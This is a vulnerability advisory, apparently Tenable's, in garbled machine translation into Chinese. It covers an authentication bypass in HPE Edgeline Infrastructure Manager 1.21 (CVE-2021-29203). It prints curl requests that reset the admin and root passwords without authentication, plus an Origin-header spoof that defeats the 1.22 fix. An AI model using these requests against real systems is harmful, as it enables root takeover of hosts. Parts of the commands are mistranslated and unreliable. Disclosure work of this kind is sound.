HPE Edgeline基础设施经理v1.21认证绕过

至关重要的

站得住脚的发现了一个认证绕过漏洞HPE Edgeline基础设施经理(EIM) 1.21版。

当用户第一次登录到web应用程序与现有的默认密码管理员帐户,用户提示更改密码的账户。密码改变是由发送请求URL /鲑/ v1 / SessionService / ResetPassword / 1。然而,密码更改后,未经过身份验证的远程攻击者可以使用相同的URL来重置管理员帐户的密码。

密码重置后,攻击者可以登录到web应用程序与新/正确的管理员密码发送请求URL /鲑/ v1 / SessionService /会话。攻击者可以改变操作系统根帐户的密码通过发送请求URL /鲑/ v1 / AccountService /账户/ 1。这允许攻击者对EIM SSH主机作为根。

下面显示了攻击步骤:

               #重置管理员密码curl - k - tlsv1.2 - h - type: application / json的- d '{“密码”:“攻击者”}’- x片https:// < eim-host > /鲑/ v1 / SessionService / ResetPassword / 1{“消息”:[{:“消息id Base.1.0。“}],”@odata更新。“:”# Message.1.0.0类型。消息","错误":{" @Message。ExtendedInfo”:[{:“消息id Base.1.0。更新”}],“代码”:“iLO.1.0。ExtendedInfo "}} #登录新管理员密码;得到一个X-Auth-Token curl ki - tlsv1.2 - h - type: application / json的- d '{“用户名”:“管理员”,“密码”:“攻击者”}“https:// < eim-host > /鲑/ v1 / SessionService /会话创建HTTP / 1.1 201服务器:nginx日期:星期四,2021年1月28日格林尼治时间06:27:54 - type: application / json内容长度:195连接:维生X-Auth-Token: eda6c27504c54cf68e1d005742c1ef8c573e5e60 Is-Ldap:假PasswordReset:错误的位置:/鲑/ v1 / SessionService /会议/ Administrator16 cache - control: no - cache OData-Version: 4.0链接:/鲑/ v1 / SchemaStore / en / SessionCollection.json; rel = describedby不同:接受允许:帖子,选项,让X-Frame-Options: SAMEORIGIN X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1;模式={“消息”:[{块:“消息id Base.1.0。创建@odata})。“:”# Message.1.0.0类型。消息","错误":{" @Message。ExtendedInfo”:[{:“消息id Base.1.0。创建“}],”代码”:“iLO.1.0。ExtendedInfo"}}[ # Reset the root password # This request sets the password for both the Administrator account (webapp user) and the root account (OS user) curl -ki --tlsv1.2 -H 'content-type: application/json' -H 'x-auth-token: eda6c27504c54cf68e1d005742c1ef8c573e5e60' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/AccountService/Accounts/1 HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Jan 2021 06:32:27 GMT Content-Type: application/json Content-Length: 75 Connection: keep-alive Vary: Accept, Cookie Allow: POST, GET, DELETE, OPTIONS, PATCH X-Frame-Options: SAMEORIGIN Set-Cookie: sessionid=kezu0jqn1xfalr3fcwet165fsvhw4v4r; expires=Thu, 11 Feb 2021 06:32:27 GMT; HttpOnly; Max-Age=1209600; Path=/; SameSite=Lax X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block {"Status": "success", "Invalid_Entries": [], "Valid_Entries": ["Password"]}
              

更新(2021年5月25日):

的1.22版本修复漏洞(cve - 2021 - 29203)是不完整的缓解可以忽略。鼓励用户升级到1.23版本,以减轻这个问题。最初试图修复漏洞,确保只有控制台用户可以重置管理员密码通过检查是否原点在HTTP请求头的价值“https://127.0.0.1”:

               - - - 1.21 / api_fs / opt / app / eim / api /观点。py -0400 12:28:48.000000000 2020-09-17 + + + 1.22 / api_fs / opt / app / eim / api /观点。py -0400 12:24:13.000000000 2021-04-01 @@ -1830、9 + 1830, 20 @@ @api_view @permission_classes((“补丁”))((AllowAll)) def specific_password_reset(请求,user_id): + is_console_user = False + request_origin = " +“HTTP_ORIGIN”请求。元和请求。元(“HTTP_ORIGIN”) = = " https://127.0.0.1 ": + request_origin =请求。元(“HTTP_ORIGIN”) + is_console_user = True -如果请求。方法= =“补丁”:+如果不是is_console_user: + logger.info(“{}的未经身份验证的密码重置”.format (request_origin)) + logger.info(“未经身份验证的密码重置仅限于控制台”)+ resp = JsonResponse (json.loads (error_template。格式(“ConsoleRestricted”、“ConsoleRestricted”))) +职责。如果请求status_code = 403 +返回resp +。方法= =“补丁”:uri = request.get_full_path()尝试:
              

然而,未经过身份验证的远程攻击者可以设置原点头“https://127.0.0.1”,从而绕过缓解:

               curl - k - tlsv1.2 - h - type: application / json的- h的起源:https://127.0.0.1 - d '{“密码”:“攻击者”}’- x片https:// < eim - 1.22 -主机> /鲑/ v1 / SessionService / ResetPassword / 1{“消息”:[{:“消息id Base.1.0。“}],”@odata更新。“:”# Message.1.0.0类型。消息","错误":{" @Message。ExtendedInfo”:[{:“消息id Base.1.0。更新”}],“代码”:“iLO.1.0。ExtendedInfo"}}
              

攻击者可以登录到EIM GUI使用新重置管理员密码。从GUI,他再次重置管理员密码,这次URL重置管理员密码/鲑/ v1 / AccountService /账户/ 1,这是不同于/鲑/ v1 / SessionService ResetPassword / 1。这个操作重置密码的管理员webapp用户和操作系统根用户。这允许攻击者对EIM SSH主机作为根。

01/28/2021——漏洞发现

02/01/2021——脆弱性透露给供应商

02/01/2021——供应商承认

02/16/2021——站得住脚的请求状态更新

02/16/2021——供应商修复正在进行中

03/08/2021——站得住脚的请求状态更新

3/8/2021——供应商修复正在进行中

3/24/2021——站得住脚的请求状态更新

3/25/2021——供应商指出,修复了,目前在测试阶段。

4/26/2021——供应商通知站得住脚的CVE信贷和请求信息。

4/29/2021——成立国家信贷“站得住脚的研究。”

05/07/2021——补丁绕过发现

05/17/2021——HPE通知。现有的咨询5月24日更新。

05/18/2021——HPE承认报告。

05/19/2021——HPE请求时间扩展。站得住脚的否认和引用的政策。

05/20/2021 - HPE请求先进咨询的副本。包括站得住脚的提供信息。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

CVE ID: cve - 2021 - 29203

成立咨询ID

交易- 2021 - 15所示

CVSSv3基地/时间的分数

9.8/9.1

CVSSv3向量

CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H

受影响的产品

HPE Edgeline v1.21基础设施经理

风险因素

至关重要的

产品

业务需求

行业

合规

Vm的洞察力

研究

有特色的网络研讨会

找到合作伙伴

站得住脚的保证合作伙伴

技术合作伙伴

支持

服务

联系专业服务

关于我们

新闻和事件

有特色的网络研讨会

探索网络曝光

HPE Edgeline基础设施经理v1.21认证绕过

剧情简介

解决方案

额外的引用

披露时间表

风险信息

咨询时间

HPE Edgeline基础设施经理v1.21认证绕过

剧情简介

解决方案

额外的引用

披露时间表

风险信息

咨询时间

站得住脚的脆弱性管理

站得住脚的脆弱性管理

谢谢你！

尝试成立Nessus专业免费的

新成立Nessus专家现在可用

买站得住脚的Nessus专业

选择您的许可

谢谢你！

尝试站得住脚的Web应用程序扫描

买站得住脚的Web应用程序扫描

谢谢你！

尝试成立Lumin

买站得住脚的Lumin

谢谢你！

请求一个站得住脚的安全演示中心

请求一个演示站得住脚的不安全

请求一个演示站得住脚的身份曝光

尝试站得住脚的云安全

联系销售代表购买站得住脚的云安全

谢谢你！

看到成立一个在行动

看到站得住脚的攻击表面管理行动

谢谢你！

尝试成立Nessus专家免费

买站得住脚的Nessus专家

选择您的许可

尝试Nessus专家免费

买站得住脚的Nessus专家

选择您的许可

新成立Nessus专家
现在可用

看到
成立一个
在行动